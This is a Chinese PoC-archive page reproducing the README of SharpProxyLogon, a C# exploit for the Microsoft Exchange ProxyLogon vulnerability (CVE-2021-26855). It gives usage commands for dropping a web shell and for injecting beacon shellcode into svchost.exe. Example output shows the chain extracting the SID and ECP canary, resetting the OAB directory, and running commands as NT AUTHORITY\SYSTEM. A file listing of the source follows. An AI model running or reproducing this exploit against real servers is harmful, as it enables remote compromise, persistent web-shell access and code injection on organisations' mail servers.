支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: 122f9ffc3798f3e4a888fc56fcf574d0d0fc1f8e

来源
https://github.com/Flangvik/SharpProxyLogon
关联漏洞
标题:Microsoft Exchange Server 代码问题漏洞 (CVE-2021-26855)
描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 安全漏洞。攻击者可构造恶意HTTP请求,并通过Exchange Server进行身份验证。进而扫描内网,获取用户敏感信息。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange
描述
C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injection
介绍
# SharpProxyLogon

C# POC for the ProxyLogon chained RCE

```
 __ _                        ___                       __
/ _\ |__   __ _ _ __ _ __   / _ \_ __ _____  ___   _  / /  ___   __ _  ___  _ __
\ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ /  / _ \ / _` |/ _ \| '_ \
_\ \ | | | (_| | |  | |_) / ___/| | | (_) >  <| |_| / /__| (_) | (_| | (_) | | | |
\__/_| |_|\__,_|_|  | .__/\/    |_|  \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_|
                    |_|                        |___/            |___/
@Flangvik

Usage Shell: SharpProxyLogon.exe <targetip> <targetemail>
Usage x64 injection: SharpProxyLogon.exe <targetip> <targetemail> <shellcodepath.bin> <inject-target-full-path>
```

Shellcode injection uses built-in [TikiTorch stub by @Rastamouse](https://github.com/rasta-mouse/TikiTorch), this will spawn, suspend and inject staged_beacon.bin into svchost.exe

```
SharpProxyLogon.exe 192.168.58.111:443 administrator@legitcorp.net C:\Temp\staged_beacon.bin "C:\Windows\System32\svchost.exe"

 __ _                        ___                       __
/ _\ |__   __ _ _ __ _ __   / _ \_ __ _____  ___   _  / /  ___   __ _  ___  _ __
\ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ /  / _ \ / _` |/ _ \| '_ \
_\ \ | | | (_| | |  | |_) / ___/| | | (_) >  <| |_| / /__| (_) | (_| | (_) | | | |
\__/_| |_|\__,_|_|  | .__/\/    |_|  \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_|
                    |_|                        |___/            |___/
@Flangvik

Usage Shell: SharpProxyLogon.exe <targetip> <targetemail>
Usage x64 injection: SharpProxyLogon.exe <targetip> <targetemail> <shellcodepath.bin> <inject-target-full-path>
[+] Got hostname DC01
[+] Got legacyDN /o=LEGITCORP/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ae2513b106f343ab8c465ec254b105c6-Administrator
[+] Got mailBoxId 7844b192-ae6a-4a16-afe4-269900d5c40a@legitcorp.net
[+] Got accountSID S-1-5-21-2354578447-2549489838-160590685-500
[+] Patched accountSID-> S-1-5-21-2354578447-2549489838-160590685-500
[+] Got msExchEcpCanary lR_xIbkU4EeRa8k0G_ekSjy7CrzM9dgIeCdYK8sMbRQMUoAQMnEfYvHrvDLT1j2jJMFBrpxnJ1s.
[+] Got aspNETSessionID 0e8da60d-ff97-4748-80f1-5834caeba361
[+] Got OABId 1d2e2d98-c636-43c7-a3a9-8041b545d575
[+] Setting ExternalUrl...
[+] Triggering ResetOABVirtualDirectory...
[+] Shell should have landed, triggering injection
```

Example with classic webshell drop
```
SharpProxyLogon.exe 192.168.58.111:443 administrator@legitcorp.net

 __ _                        ___                       __
/ _\ |__   __ _ _ __ _ __   / _ \_ __ _____  ___   _  / /  ___   __ _  ___  _ __
\ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ /  / _ \ / _` |/ _ \| '_ \
_\ \ | | | (_| | |  | |_) / ___/| | | (_) >  <| |_| / /__| (_) | (_| | (_) | | | |
\__/_| |_|\__,_|_|  | .__/\/    |_|  \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_|
                    |_|                        |___/            |___/
@Flangvik

Usage Shell: SharpProxyLogon.exe <targetip> <targetemail>
Usage x64 injection: SharpProxyLogon.exe <targetip> <targetemail> <shellcodepath.bin> <inject-target-full-path>
[+] Got hostname DC01
[+] Got legacyDN /o=LEGITCORP/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ae2513b106f343ab8c465ec254b105c6-Administrator
[+] Got mailBoxId 7844b192-ae6a-4a16-afe4-269900d5c40a@legitcorp.net
[+] Got accountSID S-1-5-21-2354578447-2549489838-160590685-500
[+] Patched accountSID-> S-1-5-21-2354578447-2549489838-160590685-500
[+] Got msExchEcpCanary V7mF62VZA0ay793xWTSE07chwKLM9dgIQolVMbEnWJJkvonIUO8VWm2BZdIklFP35W-mtZnUZ4Y.
[+] Got aspNETSessionID 9028e0b3-e56c-4b33-b0e9-b66ab9ab9067
[+] Got OABId cabf9619-178d-4d3e-84a3-748ec598a477
[+] Setting ExternalUrl...
[+] Triggering ResetOABVirtualDirectory...
[+] Shell should have landed, going semi-interactive
CMD #>whoami
nt authority\system

CMD #>hostname
DC01

CMD #>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::2598:cc98:d369:b6ed%13
   IPv4 Address. . . . . . . . . . . : 192.168.58.111
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.58.2

CMD #>
```
文件快照

 [4.0K]  /data/pocs/122f9ffc3798f3e4a888fc56fcf574d0d0fc1f8e
├── [4.1K]  README.md
├── [4.0K]  SharpProxyLogon
│   ├── [ 180]  App.config
│   ├── [ 178]  FodyWeavers.xml
│   ├── [8.5K]  FodyWeavers.xsd
│   ├── [4.0K]  Models
│   │   ├── [ 18K]  AutoDiscoverResp.cs
│   │   └── [2.0K]  GetOABVirutalDirectory.cs
│   ├── [4.2K]  packages.config
│   ├── [ 20K]  Program.cs
│   ├── [4.0K]  Properties
│   │   └── [1.4K]  AssemblyInfo.cs
│   ├── [ 13K]  SharpProxyLogon.csproj
│   └── [ 37K]  TikiTorch.cs
└── [1.4K]  SharpProxyLogon.sln

3 directories, 12 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。